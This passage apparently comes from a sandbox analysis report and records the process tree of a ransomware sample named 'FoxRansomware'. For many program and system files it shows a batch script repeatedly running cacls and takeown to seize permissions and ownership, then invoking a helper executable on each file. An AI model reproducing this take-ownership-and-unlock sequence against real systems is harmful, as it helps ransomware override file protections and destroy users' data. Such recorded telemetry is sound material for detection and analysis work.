C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner4⤵PID:4548
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3488
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""2⤵PID:872
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C3⤵PID:3900
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"3⤵
- Modifies file permissions
PID:4812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "can.hyp" -nobanner3⤵PID:3312
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "can.hyp" -nobanner4⤵PID:3440
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2052
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""2⤵PID:3764
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C3⤵PID:3792
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"3⤵
- Modifies file permissions
PID:1656
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "usa37.hyp" -nobanner3⤵PID:3168
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "usa37.hyp" -nobanner4⤵PID:3240
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""2⤵PID:3548
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C3⤵PID:1972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"3⤵
- Modifies file permissions
PID:3220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "ICELAND.TXT" -nobanner3⤵PID:3268
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "ICELAND.TXT" -nobanner4⤵PID:3364
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""2⤵PID:3580
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C3⤵PID:3384
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"3⤵PID:2572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "CP1254.TXT" -nobanner3⤵PID:2160
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "CP1254.TXT" -nobanner4⤵PID:3128
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3460
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵PID:3824
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:2496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵
- Modifies file permissions
PID:3832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "overlay.png" -nobanner3⤵PID:3212
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "overlay.png" -nobanner4⤵PID:3496
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4640
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""2⤵PID:2672
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:3156
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"3⤵
- Modifies file permissions
PID:2436
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "resource.xml" -nobanner3⤵PID:2464
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "resource.xml" -nobanner4⤵PID:3964
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3320
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""2⤵PID:1084
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:3096
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"3⤵PID:3948
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "classes.jsa" -nobanner3⤵PID:3100
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "classes.jsa" -nobanner4⤵PID:3092
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3356
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:3476
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:3956
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵PID:3004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "background.png" -nobanner3⤵PID:2920
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "background.png" -nobanner4⤵PID:3192
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1944
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""2⤵PID:1660
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:4916
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"3⤵PID:1788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "resource.xml" -nobanner3⤵PID:1932
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "resource.xml" -nobanner4⤵PID:3768
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3596
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""2⤵PID:1956
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:2600
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"3⤵PID:2224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "resource.xml" -nobanner3⤵PID:2368
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "resource.xml" -nobanner4⤵PID:2236
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2040
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:944
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:4620
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵
- Modifies file permissions
PID:3748
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "device.png" -nobanner3⤵PID:1520
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "device.png" -nobanner4⤵PID:3892
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3084
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""2⤵PID:924
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:1496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"3⤵PID:2516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "resource.xml" -nobanner3⤵PID:3124
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "resource.xml" -nobanner4⤵PID:4644
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1700
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""2⤵PID:3976
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C3⤵PID:1696
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"3⤵
- Modifies file permissions
PID:1880
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "tasks.xml" -nobanner3⤵PID:3140
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "tasks.xml" -nobanner4⤵PID:852
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2084
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:2620
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:324
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵PID:2332
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "background.png" -nobanner3⤵PID:1492
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "background.png" -nobanner4⤵PID:1072
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1300
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""2⤵PID:4572
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:2276
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"3⤵PID:1688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "resource.xml" -nobanner3⤵PID:4352
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "resource.xml" -nobanner4⤵PID:2188
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1388
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""2⤵PID:4028
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:4056
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"3⤵PID:2692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "resource.xml" -nobanner3⤵PID:4184
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "resource.xml" -nobanner4⤵PID:2172
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4576
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""2⤵PID:2580
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C3⤵PID:4448
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"3⤵PID:4300
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "adobepdf.xdc" -nobanner3⤵PID:2772
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "adobepdf.xdc" -nobanner4⤵PID:2072
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3132
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""2⤵PID:540
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C3⤵PID:2732
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"3⤵PID:2884
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "distribute_form.gif" -nobanner3⤵PID:2804
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "distribute_form.gif" -nobanner4⤵PID:1396
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3908
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""2⤵PID:1312
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C3⤵PID:2352
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"3⤵
- Modifies file permissions
PID:4440
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "main.css" -nobanner3⤵PID:4960
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "main.css" -nobanner4⤵PID:1340
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2856
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""2⤵PID:2632
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C3⤵PID:2652
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"3⤵
- Modifies file permissions
PID:4052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "review_shared.gif" -nobanner3⤵PID:1140
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "review_shared.gif" -nobanner4⤵PID:2988
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1508
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif""2⤵PID:3732
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:4036
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif"3⤵PID:3980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner3⤵PID:2576
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner4⤵PID:2700
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:828
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""2⤵PID:2560
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C3⤵PID:4800
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"3⤵PID:4652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner3⤵PID:4272
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner4⤵PID:2140
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1148
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""2⤵PID:4316
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C3⤵PID:4412
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"3⤵
- Modifies file permissions
PID:4236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "MyriadPro-Regular.otf" -nobanner3⤵PID:4832
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "MyriadPro-Regular.otf" -nobanner4⤵PID:848
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4408
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""2⤵PID:4308
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C3⤵PID:4784
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"3⤵PID:1636
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner3⤵PID:4372
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner4⤵PID:4152
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths""2⤵PID:2968
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths" /E /G Admin:F /C3⤵PID:4348
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths"3⤵PID:2724
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "can03.ths" -nobanner3⤵PID:2132
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "can03.ths" -nobanner4⤵PID:4900
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""2⤵PID:4296
-
